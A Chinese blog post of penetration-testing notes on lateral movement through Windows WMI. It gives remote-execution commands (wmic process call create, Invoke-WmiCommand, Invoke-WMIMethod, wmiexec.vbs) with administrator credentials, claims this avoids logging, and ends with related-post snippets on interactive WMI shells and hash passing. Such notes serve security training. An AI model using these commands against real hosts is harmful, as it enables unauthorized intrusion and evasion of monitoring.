【渗透测试笔记】之【内网渗透——横向移动:WMI的使用】_wmi渗透测试

最新推荐文章于 2024-07-28 23:11:13 发布
最新推荐文章于 2024-07-28 23:11:13 发布
阅读量287 收藏 3
点赞数 4
分类专栏: 程序员 文章标签: 笔记 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970893/article/details/138793879
版权
文章目录

1. 自带WMIC

特点:

  1. 不会产生日志记录
  2. 没有回显,若要查看命令结果需要配合IPC$与type命令
wmic /node:10.1.1.2 /user:administrator /password:1234567.com process call create "cmd.exe /c ipconfig >c:\ip.txt"

type \\10.1.1.2\c$\ip.txt

在这里插入图片描述

2. Invoke-WmiCommand.ps1

地址:https://github.com/AA8j/SecTools/tree/main/Invoke-WmiCommand.ps1

特点:

  1. 通过PowerShell脚本来调用WMI命令
  2. 有回显
Import-Module .\Invoke-WmiCommand.ps1;$User = "aa8j\administrator";$Password = ConvertTo-SecureString -String "1234567.com" -AsPlainText -Force;$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password;$Remote=Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 10.1.1.2;$Remote.PayloadOutput
# $User为 域名\用户名
# -String为 "密码"
# -Payload为 {命令}
# -ComputerName为 目标IP

在这里插入图片描述

3. Invoke-WMIMethod.ps1

特点:

  1. PowerShell自带
  2. 无回显
$User = "aa8j\administrator";$Password = ConvertTo-SecureString -String "1234567.com" -AsPlainText -Force;$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password;Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "10.1.1.2" -Credential $Cred
# $User为 域名\用户名
# -String为 "密码"
# -ArgumentList为 "要执行的程序"
# -ComputerName为 目标IP

执行后会返回一个进程ID:
在这里插入图片描述
到目标机器查看:
在这里插入图片描述

4. wmiexec.vbs

地址:https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs

特点:

  1. 通过调用WMI来模拟PsExec功能
  2. 在执行诸如ping、systeminfo等命令需要添加“-waite 5000”参数

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84970893
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WMI横向移动
问题很多的小明
10-06 812
项目地址:https://github.com/360-Linton-Lab/WMIHACKER 执行命令回显: cscript WMIHACKER_0.6.vbs /cmd 10.211.55.3 administrator "Password!" "ipconfig" 1 交互式shell cscript WMIHACKER_0.6.vbs /shell 10.211.55.3 administrator "Password" ............
红队内网攻防渗透内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件
HACKONE的博客
06-22 482
因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。这里ping 3.32 是能ping通的 所以防火墙入站规则是关闭的,可以执行正向shell。
渗透测试笔记】之【内网渗透——横向移动WMI使用
AA8j的博客
11-18 4430
文章目录1. 自带WMIC2. Invoke-WmiCommand.ps13. Invoke-WMIMethod.ps14. wmiexec.vbs5. wmiexec.py 1. 自带WMIC 特点: 不会产生日志记录 没有回显,若要查看命令结果需要配合IPC$与type命令 wmic /node:10.1.1.2 /user:administrator /password:1234567.com process call create "cmd.exe /c ipconfig >c:\ip.t
windows监控txt写入_WMI(windows管理模块)横向渗透
weixin_39808953的博客
12-09 202
自从PsExec被杀毒软件监控之后,黑客们又开始转移到WMI上,通过渗透测试发现,使用wmiexec进行横向移动时,windows操作系统竟然无动于衷,没有做任何日志记录。于是,越来越多的APT高级持续性威胁,开始了对WMI进行攻击研究~1、使用WMI远程命令执行win7域用户--> windows server 2012域用户(成功)wmic /node:192.168.160.143 /...
内网渗透-smb&wmi
G208_522的博客
10-26 515
内网渗透系列
渗透测试 _ 内网信息收集1
08-03
渗透测试】是一种安全测试方法,旨在模拟黑客攻击行为,以...了解这些信息后,渗透测试人员可以更有效地寻找漏洞,实施横向移动,并最终达到测试的目标。在整个过程中,确保遵循道德和法律规范,尊重网络安全和隐私。
内网横向移动之:PSExec 与 WMI
f_carey的博客
11-14 1510
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 PSExec PSExec 原理: 通过管道在远程目标主机上创建一个 PSExec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过 PSExec 服务运行命令,结束后删除服务。 1 Windows 下 PSExec 使用 PSExec 下载地址 利用注意点: 需要远程系统开启.
红队内网攻防渗透内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 223
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
红队内网攻防渗透内网渗透之Windows内网信息收集:内网和域
HACKONE的博客
04-10 167
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内网中通常会部署大量的网络安全设备例如IDSIPS日志审计安全网关反病毒等在域网络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
web安全攻防渗透测试实训笔记
m0_65385236的博客
04-07 1366
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
WMI利用(横向移动
Ping_Pig的博客
11-09 1741
WMI利用(横向移动) 讲在前面:     上一篇文章我们简单的解释了什么是WMIWMI做什么,为什么使用WMI。本文是笔者在阅读国内部分的解释WMI横向移动的文章后写下的一篇文章,希望帮助同学们在攻防中进入横向移动后根据实际场景利用WMI来解决问题。在横向移动中的固定过程中一定离不开“信息收集”,然后分析信息根据实际场景(工作组或者域)来进行横向移动,至于使用什么工具,为什么使用这个工具,笔者使用WMI的意见。所以本文分为三个段落,信息收集、横向移动、部分意见。
Windows 内网渗透横向渗透
qq_53742230的博客
07-31 3353
内网渗透横向渗透
内网横向——利用WMI进行内网横向
最新发布
qq_55202378的博客
07-28 649
WMI(Windows Management Instrumentation,Windows管理规范)是一项核心的windows管理技术。从Windows 98开始,windows操作系统都支持WMI。用户可以通过WMI管理本地和远程计算机。Windows为远程传输WMI数据提供了两个可用的协议,即分布式组件对象模型()和windows远程管理(,WinRM),使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等都可以远程执行。
内网渗透----3、后渗透信息收集之wmic命令
七天
07-14 559
文章目录一、WMIC定义二、WMIC的使用三、Powershell下的get-WMI 一、WMIC定义 WMIC是扩展WMI(Windows Management Instrumentation,Windows管理规范),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,比如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的 编程语言或VBScript之类的 脚本语言,或者不掌握
信息收集 -- 内网渗透(wmic)
weixin_41489908的博客
11-24 684
昨天晚上和舍友聊天,彼此聊着自己的前女友,聊到最后,我们同时对彼此说了一句,你真贱。。。 ---- 网易云热评 一、WMIC简介 WMIC是扩展WMI(Windows Management Instrumentation,Windows管理规范),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,比如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScrip..
wmi渗透测试中的运用
weixin_30426879的博客
07-08 116
Abusing WMI to Build a Persistent, Asynchronous, and Fileless Backdoor滥用 WMI 打造一个永久、异步、无文件后门http://dwz.cn/1fffBI(pdf) #Blackhat2015WMI - Windows Management Instrumentationhttp://www.activexper...
内网渗透(四十二)之横向移动篇-WMIC远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 518
WMI是Windows在Powershell还未发布前,微软用来管理Windows系统的重要数据库工具,WMI本身的组织架构是一个数据库架构,WMI 服务使用 DCOM或 WinRM 协议,自从 PsExec 在内网中被严格监控后,越来越多的反病毒厂商将 PsExec 加入了黑名单,于是黑客们渐渐开始使用 WMI 进行横向移动。通过渗透测试发现,在使用 wmiexec 进行横向移动时,windows 操作系统默认不会将 WMI 的操作记录在日志中。因此很多APT开始使用WMI进行攻击。
内网安全学习(三)---横向渗透
qi_SJQ_的博客
02-09 1061
横向 smb&wmi 明文或 hash 传递 1.前置知识: 知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码。 Windows2012以下版本安装KB2871997补丁,也会导致无法获取明文密码。 针对以上情况,我们提供了4种方式解决此类问题: 1.利用哈希hash传递(pth,ptk等)进行移动。 2.利用其他服务协议(SMB,WMI等)进行哈希移动。 3.利用注册表操作开启Wdigest Auth值进行获取。 4.利用工具或第三方平台(
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值